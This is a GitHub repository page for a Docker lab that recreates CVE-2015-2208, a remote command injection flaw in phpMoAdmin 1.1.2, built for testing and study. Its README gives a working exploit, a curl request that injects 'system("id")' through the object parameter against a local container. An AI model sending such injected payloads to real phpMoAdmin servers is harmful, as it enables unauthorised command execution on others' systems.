Skip to content

ptantiku/cve-2015-2208

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

#Dockerfile to simulate environment for CVE-2015-2208#

The saveObject function in moadmin.php in phpMoAdmin 1.1.2 allows remote attackers to execute arbitrary commands via shell metacharacters in the object parameter.

Discovered by: @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio

References:

##Test environment##

sudo docker run -d -p 8888:80 ptantiku/cve-2015-2208

##Exploit##

curl http://localhost:8888/moadmin.php -d 'object=1;system("id");'

About

Docker simulating cve-2015-2208 vulnerability

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages